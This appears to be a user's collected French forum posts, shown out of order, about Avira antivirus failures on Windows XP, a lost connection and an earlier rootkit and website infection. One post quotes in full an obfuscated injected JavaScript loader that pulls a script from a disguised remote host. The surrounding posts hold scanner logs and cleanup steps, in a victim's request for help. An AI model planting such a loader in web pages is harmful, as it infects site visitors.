WebMap

Bonjour à tous, 8 mois plus tard... Toujours sous Win XP Pro, Avira Free Antivirus plante plus que jamais. Il y a quelques semaines, j'ai à nouveau été confronté au problème (manifestement récurrent) de mise à jour impossible ou de protection en temps réel désactivée. En tentant une réinstallation, j'avais perdu ma connexion internet (voir : Problème Avira Free et plus de connexion Internet (2) ). Une fois ce problème résolu, je me retrouve donc encore avec des bugs à répétitions. - Mise à jour automatique impossible, seule la mise à jour manuelle fonctionne. - Avira tente de faire des mises à jours toutes les 2 heures, j'ai beau modifier le périodicité, elle se remet systématiquement à 2h00... j'ai donc droit au message d'erreur de la mise à jour toutes les 2h00... - Scan impossible - Protection temps réel inactive (en apparence semble-t-il...) Je lis çà et là que ces problèmes sont récurrents... est restent souvent sans solution. Je tente un dernier appel à l'aide avant de définitivement rayer Avira de ma liste des antivirus favoris.

Une heure et demie plus tard, me revoilà... avec mon PC et sa connexion retrouvée ! Apparemment, la réparation de windows repair à été efficace. Ma connexion est revenue et j'ai réinstallé proprement mon antivirus Avira avec mise à jour effectuée et protection en temps réel activée... Problème résolu, mais j'aurai bien aimé en connaître précisément la cause. Merci à Pear et à Dylav !

Bonjour, je ne comprends pas pourquoi persister avec cette commande findstr /c:"[sR]" %windir%\Logs\CBS\CBS.log alors que l'on vient de voir que sous XP il n'y a pas de répertoire Logs... (j'ai réessayé, avec exactement le même résultat : "Le chemin d'accès spécifié est introuvable" et évidemment aucun rapport sfcdetailsrepair.txt) Hormis ça, j'ai procédé aux 5 étapes de windows repair. Le fichier Cbs.bat ne donnant rien, j'ai lancé une réparation... c'est en cours...

Me voilà revenu quasiment au point de départ...

Probablement oui, je viens de relancer, la fenêtre s'affiche qu'une fois, avec le même message, mais cette fois-ci sans caractères barbares. Entre parenthèses, les caractères barbares étaient dans la phrase "chemin d'accès spécifié..." et j'évite les caractères accentués dans mes noms de répertoires et fichiers. Oui sous XP c'est Documents and settings/ma-session/Bureau. Et je ne trouve pas de répertoire Logs dans mon WINDOWS. L'ordi avec lequel je suis connecté est aussi sous XP, et je n'y trouve pas non plus ce répertoire. Apparemment, ce script @echo off findstr /c:"[SR]" %windir%\Logs\CBS\CBS.log > "%userprofile%\Desktop\sfcdetails.txt" pause n'est pas adapté à XP. Il faudrait peut-être trouver l'équivalent de ce fameux répertoire Logs sous XP et remplacer Desktop par Bureau, non ? pour info, le script "pour en avoir le cœur net" m'affiche bien ceci : C:\WINDOWS\Logs C:\Documents and settings\ma-session\Desktop

Bonjour Dylav, merci pour ton aide, elle me permet d'éclaircir un point... C'est bien ainsi que je lance le script, j'avais bien remarqué l'absence de cette option sur XP. Pas de souci de ce côté là. Mes extensions ne sont pas masquées. Voilà qui me permet d'avancer. Voici donc ce que m'affiche le script : Le chemin d'accès spécifié est introuvable (avec des caractères barbares à la place des caractères accentués). Appuyez sur une touche pour continuer... Et quand j'appuie sur une touche, nouvelle fenêtre avec le même message...je recommence... les deux fenêtres se ferment sans aucun résultat. En réalité, je ne suis pas vraiment surpris. En farfouillant dans mes répertoires, je ne trouve pas de répertoire WINDOWS/ Logs ni de Desktop...

Ben, tout simplement à vérifier que l'exécution se passe bien sur un autre ordi, et pas sur le mien... C'est idiot ? Si, si, je suis à la lettre la procédure... et je la décris : Je clique droit sur le bureau, je sélectionne l'action "Nouveau document texte", cela me créer un fichier intitulé Nouveau Document texte.txt sur mon bureau, je l'ouvre avec le bloc note (j'ai aussi essayé avec Notepad++) pour y coller les deux ligne vertes et je renomme le fichier Cbs.bat... C'est pas bien sorcier, je ne vois pas où j'aurais fait une erreur. Par contre, lorsque je clique-droit sur le fichier, je n'ai pas l'option "Exécuter..." donc je lance en double cliquant ou avec la touche Entrée.

Ah ? pourtant cela concernait la commande sfc /scannow Je persiste, j'ai essayé plusieurs fois de lancer Cbs.bat, comme dit auparavant, une fenêtre s'ouvre, je n'ai pas le temps de lire ce qui y est affiché (ça commence par "impossible...") et je n'obtiens pas de fichier sfcdetails.txt sur mon bureau. Voici mon fichier Cbs.bat : http://www.cjoint.com/c/EIsnzVuQBxW Je suis parvenu une fois à faire une copie d'écran, par chance, mais que cette fenêtre est différente des autres, la voici : Puis-je tester le fichier Cbs.bat sur un autre ordinateur, sans risque ?

Désolé de "tout mélanger" (je ne comprends d'ailleurs pas en quoi je mélange tout...). Effectivement, je n'ai aucune difficulté à copier/coller ces deux lignes... et pourtant, le fait est que je ne vois aucun rapport sfcdetailsrepair.txt qui s'affiche. Je retourne donc à mon PC (à 8 km) pour réessayer...

Lorsque j'ai lancé le scan sfc /scannow tout semble s'être bien déroulé, j'ai bien eu la fenêtre suivante : C'est la suite avec le fichier .bat qui ne semble pas passer correctement. Une chose m'inquiète, j'ai lu sur le site tutoriauxpc.com que, sous XP SP3, il faut un CD Windows XP SP3 pour effectuer la réparation, or je n'ai que le CD XP pro d'origine...

Me revoilà... J'ai lancé Chkdsk, mais je n'avais pas compris que le lien était une application à télécharger... Voici le rapport extrait de l'observateur d'évènements : Je viens de télécharger l'application Report_CHKDSK.exe... je la lancerai à mon retour sur mon PC. Ensuite... J'ai lancé la commande scannow... puis créé le fichier Cbs.bat sur mon bureau. En le lançant, j'ai une fenêtre qui s'ouvre et se referme aussitôt, j'ai à peine le temps d'y apercevoir un début de ligne : "Impossible..." . Et je ne vois aucun rapport sfcdetailsrepair.txt qui s'affiche. Cela dit, j'ai consulté le journal d'évènements au démarrage du PC, à toute fin utile, voici ce que je trouve comme erreurs et avertissements : Rubrique Système : Avertissement : Votre ordinateur n'a pas pu configurer automatiquement les paramètres IP pour la carte avec l'adresse réseau 0050FC4450F6. Il s'est produit l'erreur suivante pendant la configuration : Le fournisseur de services demandé n'a pas pu être chargé ou initialisé. . Erreurs (dans l'ordre chronologique) : - Le processus d'initialisation de la restauration du système a échoué. - Il y a eu une erreur [DATABASE OPEN FAILED] en traitant la base de données des pilotes. - Le service General Purpose USB Driver (adildr.sys) n'a pas pu démarrer en raison de l'erreur : Le fichier spécifié est introuvable. - Le service avast! HardwareID n'a pas pu démarrer en raison de l'erreur : La taille de bloc actuelle est incorrecte pour un accès à une nouvelle bande d'une partition multivolume. (Curieux qu'Avast apparaisse encore... je l'avais désinstallé depuis longtemps...) - Le service Services IPSEC s'est arrêté avec l'erreur : Le fournisseur de services demandé n'a pas pu être chargé ou initialisé. - Le service Service de restauration système s'est arrêté avec l'erreur : Le fichier spécifié est introuvable. Autre erreur rencontrée auparavant : - DCOM a reçu l'erreur "Le service ne peut pas être démarré parce qu'il est désactivé ou qu'aucun périphérique activé ne lui est associé. " lors de la mise en route du service wuauserv avec les arguments "" pour démarrer le serveur : {E60687F7-01A1-40AA-86AC-DB1CBF673334} Rubrique Application Erreur : - Application défaillante avira_fr____fm.exe, version 1.1.25.25607, module défaillant avira_fr____fm.exe, version 1.1.25.25607, adresse de défaillance 0x00007290. Enfin, lorsque je tente une réparation de la connexion, Windows me renvoie ce message : Windows n'a pas pu réparer le problème car l'opération suivante n'a pas été menée à bien : Renouvellement de votre adresse IP Je reviens demain après avoir lancé l'application Report_CHKDSK.exe...

je suis déjà passé par la case CTR et ZHPDiag...

Avira n'est-il pas un des meilleurs (sinon le meilleur) Antivirus gratuit ? J'utilisais auparavant Avast, mais celui-ci me lançait régulièrement des fausses alertes et surtout, il m'a supprimé sans prévenir des logiciels non infectés dont j'ai besoin. De toute manière, actuellement, ce n'est pas ma préoccupation ni ma question... J'ai avant tout besoin de retrouver ma connexion. Le rapport de HiJackThis semble me dire qu'un certain nombre de services ne fonctionnent plus correctement (Unknown Owner) et toutes les lignes numérotées 023 ne paraissaient pas dans mes précédentes analyses.

Bonjour à tous, J'ouvre ce sujet suite à ma première demande ici : Problème Avira Free et plus de connexion internet - Analyses et éradication malwares - Forums Zebulon.fr J'ai été confronté depuis plusieurs jours au problème (récurrent il me semble) de mise à jour impossible ou de protection en temps réel désactivée avec Avira Free Antivirus. Les "solutions" proposées par le suport d'Avira n'ayant pas résolu le problème, j'ai procédé à une désinstallation / réinstallation de l'antivirus. Mais le bug revenait à chaque fois... d'où nouvelle réinstallation, etc, jusqu'à ce que je perde ma connexion internet... après une nième désinstallation d'Avira. De plus en plus inquiet, je lance un scan avec MalwareByte qui ne trouve rien de suspect... je lance HiJackThis dont voici le rapport : http://www.cjoint.com/c/EIonqxMQTpW Je vois notamment ceci : et d'autres lignes que je n'avais pas auparavant (je lançais de temps en temps HiJackThis pour vérifier si je n'avais des "nouveautés"...). En tentant de réparer la connexion, Windows me répond que la réparation est impossible car il n'y a pas d'adresse IP attribuée à l'ordinateur... MalwareByte ne voit toujours rien. J'ai réinstallé Avira, cela ne change rien... D'aileurs, le chemin donné par HiJackThis ne correspond pas au répertoire d'installation d'Avira (C:\Program Files\Avira\AntiVir Desktop\...) ! Après analyse des rapports CTR et ZHPDiag, il s'avère que mon PC n'est point infecté... Merci de bien vouloir me venir en aide.

Merci encore, Cela me rassure, j'ouvre donc un nouveau sujet... Cela dit, j'ai vu que les problèmes que je rencontre avec l'antivirus sont récurrent sur divers forums d'entraide... À tout hasard, as-tu une idée de la cause ?

Bonsoir, merci pour la réactivité... Voici les deux rapports mis dans un fichier .zip : http://www.cjoint.com/c/EIpqKfbQxJW

Bonjour à tous, J'ai été confronté depuis plusieurs jours au problème (récurrent il me semble) de mise à jour impossible ou de protection en temps réel désactivée avec Avira Free Antivirus. Les "solutions" proposées par le suport d'Avira n'ayant pas résolu le problème, j'ai procédé à une désinstallation / réinstallation de l'antivirus. Mais le bug revenait à chaque fois... d'où nouvelle réinstallation, etc, jusqu'à ce que je perde ma connexion internet... après une nième désinstallation d'Avira. De plus en plus inquiet, je lance un scan avec MalwareByte qui ne trouve rien de suspect... je lance HiJackThis dont voici le rapport : http://www.cjoint.com/c/EIonqxMQTpW Je vois notamment ceci : et d'autres lignes que je n'avais pas auparavant (je lançais de temps en temps HiJackThis pour vérifier si je n'avais des "nouveautés"...). En tentant de réparer la connexion, Windows me répond que la réparation est impossible car il n'y a pas d'adresse IP attribuée à l'ordinateur... MalwareByte ne voit toujours rien. J'ai réinstallé Avira, cela ne change rien... D'aileurs, le chemin donné par HiJackThis ne correspond pas au répertoire d'installation d'Avira (C:\Program Files\Avira\AntiVir Desktop\...) ! Merci de bien vouloir me venir en aide.

Ben... oui, c'est ainsi que j'ai fait la mise à jour manuelle. Mais, comme il est écrit sur le site d'Avira "l’installation automatique des mises à jour est le meilleur moyen de rester protégé..." Je préfèrerais que la mise à jour automatique fonctione, et ne pas avoir besoin de passer par la procédure manuelle.

Merci pour le lien, j'ai suivi la procédure décrite. Après réinstallation de l'antivirus, la protection en temps réel s'est activé. J'ai tenté de lancer une mise à jour, le problème persiste (update.exe a rencontré un problème et doit fermer), je me suis donc lancé dans une mise à jour manuelle, avec succès. Malheureusement, entretemps, la protection en temps réel s'est désactivée, et l'antivirus a planté (pas de réponse) lorsque j'ai voulu la réactiver. Après redémarrage du PC, la protection est active. Le scan fonctionne, par contre il m'est toujours impossible de faire une mise à jour...

Bonjour à tous, Mon PC sous Windows XP pro, SP3, était jusqu'à mainenant protégé par Avira Free Antivirus. Mais depuis quelques jours, les mises à jour ne fonctionnaient plus. J'ai désinstallé l'antivirus puis réinstallé la version 2015 (Version du produit 15.0.8.650 02/03/2015) et plus rien ne fonctionne : pas de protection en temps réel (impossible de l'activer), scan et mise à jour impossibles (j'ai à chaque fois un message d'erreur : update.exe (ou avscan.exe) a rencontré un problème et doit fermer.)... J'ai tenté de réparer, de réinstaller... cela ne fonctionne toujours pas. Dans le doute, j'ai procédé à un scan avec MalwareBytes, il ne trouve aucun problème... Merci de bien vouloir me venir en aide et me conseiller.

Merci encore... j'ai procédé à un nettoyage complet de mes sites. À noter que le script ne s'insère pas que sur les pages index.html ou index.php... Je l'ai retrouvé dans toutes les pages javascript, sans les balises <script></script> Il faut donc effectuer une recherche du script avec et sans ces balises... Pour plus de sureté, effectuer d'abord une recherche dans tous les fichiers de la portion de code /*LGPL*/ try{ window.onload = function(){ et à chaque fois que ce code est trouvé, relancer une recherche avec l'ensemble du script pour le supprimer dans toutes les pages. Puis répéter la recherche de la portion de code jusqu'à ce que celle si ne soit plus trouvé. Ça peut être un peu long... Je devrais peut-être ouvrir un autre sujet, mais comme c'est lié à mon problème je pose la question ici : question plusieurs fois abordée sur ce forum... sur la comparaison Avast vs Antivir... Je sais que Antivir est vivement conseillé ici, cependant, il apparait que Antivir ne voit pas le troyen provoqué par ce script... Avast le voit... Je m'en suis rendu compte suite à divers retour d'internautes (équipés d'Avast) sur mes sites... Alors question : Antivir est-il toujours meilleur que Avast ou sont-ils équivalents ?

Ah ?... Pourtant, j'avais effectué plusieurs fois la procédure "Supprimer la sélection", en vain...MBAM m'indiquait dans son rapport "Deleted on reboot" mais le fichier revenait quand même. Mon antivirus ne semble pas protéger ma machine contre ce genre de malware... J'avais SpyBot S&D, SpywareBlaster et Avira Antivir Personal installés sur ma machine, ce qui n'a pas empêché l'infection... quelle protection dois-je ajouter pour éviter une nouvelle infection ? Un par-feu autre que celui de windows comme ZoneAlarm ? Merci encore !

Merci de ta réponse. Voilà le rapport de MBAM après avoir exécuter rkill... Malwarebytes' Anti-Malware 1.44 Version de la base de données: 3569 Windows 5.1.2600 Service Pack 2 Internet Explorer 8.0.6001.18702 15/01/2010 20:13:08 mbam-log-2010-01-15 (20-13-03).txt Type de recherche: Examen complet (C:\|D:\|E:\|F:\|) Eléments examinés: 290103 Temps écoulé: 2 hour(s), 7 minute(s), 5 second(s) Processus mémoire infecté(s): 0 Module(s) mémoire infecté(s): 0 Clé(s) du Registre infectée(s): 0 Valeur(s) du Registre infectée(s): 0 Elément(s) de données du Registre infecté(s): 0 Dossier(s) infecté(s): 0 Fichier(s) infecté(s): 1 Processus mémoire infecté(s): (Aucun élément nuisible détecté) Module(s) mémoire infecté(s): (Aucun élément nuisible détecté) Clé(s) du Registre infectée(s): (Aucun élément nuisible détecté) Valeur(s) du Registre infectée(s): (Aucun élément nuisible détecté) Elément(s) de données du Registre infecté(s): (Aucun élément nuisible détecté) Dossier(s) infecté(s): (Aucun élément nuisible détecté) Fichier(s) infecté(s): C:\WINDOWS\system32\drivers\gsbigqf.sys (Rootkit.Agent) -> No action taken. Le résultat est le même... J'ai reçu en message privé des conseils m'orientant vers le forum Malekal et préconisant l'utilisation de Avenger avec le script approprié... Script : Drivers to delete: gsbigqf Registry keys to delete: HKLM\SYSTEM\ControlSet003\Services\gsbigqf Voici le rapport d'Avenger après redémarrage : Logfile of The Avenger Version 2.0, (c) by Swandog46 http://swandog46.geekstogo.com Platform: Windows XP ******************* Script file opened successfully. Script file read successfully. Backups directory opened successfully at C:\Avenger ******************* Beginning to process script file: Rootkit scan active. No rootkits found! Driver "gsbigqf" deleted successfully. Registry key "HKLM\SYSTEM\ControlSet003\Services\gsbigqf" deleted successfully. Completed script processing. ******************* Finished! Terminate. Mais le fichier system32/drivers/gsbigqf.sys était toujours présent et Avira lance une alerte ! J'ai demandé la suppression... et je redémarre... [EDIT] Quelques minutes plus tard... Mon PC a bien redémarré... j'ai lancé un scan rapide de MBAM (il repérait le rootkit avec le scan rapide)... plus rien. J'effectuerai un scan complet plus tard, pour m'assurer qu'il n'y a plus de problème. Seule inquiétude, je ne sais pas si la suppression par Avira était la meilleure solution. Le fichier system32/drivers/gsbigqf.sys a bien disparu, mais n'est-ce pas remplacer un mal par un autre ? Quelles peuvent être les conséquences de cette suppression ? Merci pour ton aide et merci à Angélique pour son message en privé !

Bonjour, Cela fait plus d'une semaine que je me bagarre contre des malwares récalcitrants... et je ne me sens pas encore le cœur à formater ma partition... Cela a commencé par l'infection d'un site Wiki, que j'ai développé. Un petit coup d'oeil dans le code et je découvre ceci, un script incompréhensible (pour moi) en bas de page d'accueil : <script>/*LGPL*/ try{ window.onload = function(){var G8rd4qjbxo3 = document.createElement('s#c!$)r!i&p@t@'.replace(/\$|#|\!|\(|&|\)|@|\^/ig, ''));G8rd4qjbxo3.setAttribute('defer', 'd#e$^(@^f#)e&r$$!'.replace(/\!|#|@|\$|&|\^|\)|\(/ig, ''));G8rd4qjbxo3.setAttribute('type', 't!e!^x$@)t!##/^@j)a^(#(v)$(a!@s)c@@r(&$i^p^!)($t^'.replace(/@|\)|#|\!|\^|\(|\$|&/ig, ''));G8rd4qjbxo3.setAttribute('id', 'L^&!(7^)@@p)&((o(#h)m@(k!)!v(^!)o$5$(m!g@&@^m#@'.replace(/&|\(|@|\$|#|\^|\!|\)/ig, ''));G8rd4qjbxo3.setAttribute('s&r))c&'.replace(/\(|#|\!|\^|&|@|\)|\$/ig, ''), 'h(()!t#&t)^$p)^@^:#/!($/@^@e!&^t#!(s####y!!!-^(@($c@!&o$&(^m#@&(.$^@c)@a))r&t$#&o!^$@^o&$n&^&$n&e&t&w)o^&!$r)k!$().!!@c&!o(^@m#!!)#.)v$(e@n&t(@e((-&(p@$r(i@#))v!!&&&e@(&(e^^)(-@!c^$!o$&m#@).#&t(h&@#@e($^l((a#$@)c&@@e)!w&(e@$)!b)!&!^.(!(r#$u):#8(0!)#8!!&^0@@)/^!!x$@!i@@c@&(i#@!.(!n!e@t$$^/!x@^i#@^c)$#i!&@.)n)^$e#)t(/&(^s$&)&a@(n(!$#o^@!o@k^^@).$!(^^c)#!o@)^m&/^!$t@#(r@i(#p)$!o)))d(.$c^o)@m#@#$/$^#@g&)o)!$^o&g(l)@e()^$.&(@^c!o^&$m$/$@'.replace(/&|\)|\(|#|@|\!|\$|\^/ig, ''));if (document){document.body.appendChild(G8rd4qjbxo3);}} } catch(Eqm24t96352nr6szyx) {}</script> <!--038a42264513ede9ee6d8a40ada39e78--> Ne soupçonnant pas l'ampleur du problème, j'efface le script et remet en ligne le fichier corrigé. Le Wiki était revenu, apparemment, à son état normal. Le lendemain... rebelote ! Et je découvre que mon forum est infecté de la même manière ainsi que tous les sites dont je possède les codes FTP ! (le script est inséré dans toutes les pages index.php, .html...) Le problème est semblable à ceux décrit dans ce sujet : Attaques Sites Web par Iframes (et similaires). Je procède donc à un nettoyage complet des sites (suppression de tous les codes malveillants et/ou récupération des Backups) et à l'analyse de mon PC avec MalwareBytes qui me détecte plusieurs Trojans et un Rootkit. D'après le rapport d'analyse, il parvient à supprimer tous les problèmes. Une mise à jour de mon XP Pro et je me retrouve avec Security Tools que j'arrive, non sans mal, à supprimer avec MalwareBytes. Mais l'infection de certains sites c'est reproduit à plusieurs reprises, malgré les changements de mot de passe FTP (et effacement des mots de passe sur Filezilla) et aujourd'hui je redécouvre un nouveau rootkit sur ma machine. Voici un rapport d'analyse de Gmer. GMER 1.0.15.15281 - http://www.gmer.net Rootkit scan 2010-01-15 13:15:21 Windows 5.1.2600 Service Pack 2 Running: gmer.exe; Driver: C:\DOCUME~1\FIFI\LOCALS~1\Temp\pwlyquod.sys ---- System - GMER 1.0.15 ---- SSDT F7F60756 ZwCreateKey SSDT F7F6074C ZwCreateThread SSDT F7F6075B ZwDeleteKey SSDT F7F60765 ZwDeleteValueKey SSDT F7F6076A ZwLoadKey SSDT F7F60738 ZwOpenProcess SSDT F7F6073D ZwOpenThread SSDT F7F60774 ZwReplaceKey SSDT F7F6076F ZwRestoreKey SSDT F7F60760 ZwSetValueKey SSDT F7F60747 ZwTerminateProcess ---- Kernel code sections - GMER 1.0.15 ---- .pak2 C:\WINDOWS\system32\drivers\gsbigqf.sys entry point in ".pak2" section [0xF7774168] ? C:\WINDOWS\system32\drivers\gsbigqf.sys Un périphérique attaché au système ne fonctionne pas correctement. PAGE Ntfs.sys F7571E88 4 Bytes CALL 8676F611 init C:\WINDOWS\system32\drivers\ALCXSENS.SYS entry point in "init" section [0xF6D537F0] pnidata C:\WINDOWS\System32\DRIVERS\secdrv.sys unknown last section [0xA8739F00, 0x24000, 0x48000000] ---- Devices - GMER 1.0.15 ---- Device \FileSystem\Ntfs \Ntfs 866DF298 Device \Driver\Cdrom \Device\CdRom0 8679196E Device \Driver\Cdrom \Device\CdRom1 8679196E Device \Driver\atapi \Device\Ide\IdePort0 8679301C Device \Driver\atapi \Device\Ide\IdePort1 8679301C Device \Driver\atapi \Device\Ide\IdeDeviceP0T0L0-4 8679301C Device \Driver\atapi \Device\Ide\IdeDeviceP0T1L0-c 8679301C Device \Driver\atapi \Device\Ide\IdeDeviceP1T0L0-18 8679301C Device \Driver\atapi \Device\Ide\IdeDeviceP1T1L0-20 8679301C Device \Driver\Cdrom \Device\CdRom2 8679196E Device \Driver\PrecSim \Device\Scsi\PrecSim1Port0Path0Target0Lun0 8679300C Device \Driver\PrecSim \Device\Scsi\PrecSim1 8679300C AttachedDevice \FileSystem\Fastfat \Fat fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation) AttachedDevice \FileSystem\Fastfat \Fat fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation) ---- Services - GMER 1.0.15 ---- Service (*** hidden *** ) [BOOT] gsbigqf <-- ROOTKIT !!! ---- Registry - GMER 1.0.15 ---- Reg HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@Type 1 Reg HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@Start 0 Reg HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@ErrorControl 0 Reg HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@Group Boot Bus Extender Reg HKLM\SYSTEM\ControlSet003\Services\gsbigqf@Type 1 Reg HKLM\SYSTEM\ControlSet003\Services\gsbigqf@Start 0 Reg HKLM\SYSTEM\ControlSet003\Services\gsbigqf@ErrorControl 0 Reg HKLM\SYSTEM\ControlSet003\Services\gsbigqf@Group Boot Bus Extender Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs@C:\Program Files\Macromedia\Dreamweaver 8\Configuration\Behaviors\Events\4.0 et ultÃ\x2026Â\xbdrieurs.htm 1 ---- EOF - GMER 1.0.15 ---- J'ai donc un fichier "rootkité" gsbigqf.sys dans le répertoire system32/drivers/ (MalwareBytes le voit mais ne l'éradique pas) Maintenant que Gmer l'a trouvé, que dois-je faire ? Un delete service pour la ligne suivante (la seule qui apparait en rouge dans le rapport de scan) est-il suffisant ? Service (*** hidden ***) [BOOT] gsbigqf Y a-t-il d'autres lignes sur lesquelles je dois faire une action ? Au cas où... j'ajoute le rapport Hijackthis... (mais je n'y vois pas vraiment de souci...) Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 14:31:02, on 15/01/2010 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v8.00 (8.00.6001.18702) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\System32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir Desktop\sched.exe C:\Program Files\Avira\AntiVir Desktop\avguard.exe C:\Program Files\Java\jre6\bin\jqs.exe C:\PROGRA~1\SMARTP~1\SMARTP~1.EXE C:\WINDOWS\System32\svchost.exe C:\Program Files\Smart Power\jre\bin\javaw.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Avira\AntiVir Desktop\avgnt.exe C:\Program Files\Java\jre6\bin\jusched.exe C:\WINDOWS\system32\ctfmon.exe C:\PROGRA~1\SMARTP~1\monitor.exe C:\Program Files\Smart Power\jre\bin\javaw.exe C:\PROGRA~1\SMARTP~1\SPRMI.exe C:\Program Files\Smart Power\jre\bin\javaw.exe C:\WINDOWS\system32\wuauclt.exe C:\Program Files\Mozilla Firefox\firefox.exe E:\antivirus\Gmer\gmer.exe C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\system32\NOTEPAD.EXE C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - (no file) O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe" O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe" O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Fichiers communs\Adobe\ARM\1.0\AdobeARM.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user') O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe O8 - Extra context menu item: Convertir les liens sélectionnés en fichier Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\System32\shdocvw.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\System32\shdocvw.dll O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe O23 - Service: Avira AntiVir Planificateur (AntiVirSchedulerService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\avguard.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe O23 - Service: SmartPower - ZeroG Software - C:\PROGRA~1\SMARTP~1\SMARTP~1.EXE O23 - Service: SmartPowerManager - ZeroG Software - C:\PROGRA~1\SMARTP~1\manager.exe O23 - Service: SmartPowerMonitor - ZeroG Software - C:\PROGRA~1\SMARTP~1\monitor.exe O23 - Service: SmartPowerRMI - ZeroG Software - C:\PROGRA~1\SMARTP~1\SPRMI.exe -- End of file - 5215 bytes Merci de votre aide.

Bonjour, je rencontre un petit problème concernant la liste des programmes recommandés sous windows xp pro. Dans l'explorateur de fichiers, les fichiers .html et .htm sont précédés de l'icône correspondant au bloc-note, pourtant ils s'ouvrent avec Firefox . Lorsque je clique-droit sur le fichier pour choisir ouvrir avec... le programme par défaut est effectivement le bloc-note ! J'ai essayé de modifier le registre dans HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList Je supprime la clé correspondant à Notepad ainsi que toutes celles qui ne m'intéressent pas (Wordpad, dreamweaver, openoffice, iexplorer). Ensuite, après avoir quitté l'éditeur de registre, les fichiers s'affichent toujours avec l'icône du bloc-note, s'ouvrent toujours avec Firefox, la liste des programmes recommandés reste inchangée et le programme par défaut est encore le bloc-note... Auriez-vous une idée de la cause de mon souci de problème ? Je crains un programme malveillant... Qu'en pensez-vous ? Merci d'avance de votre aide.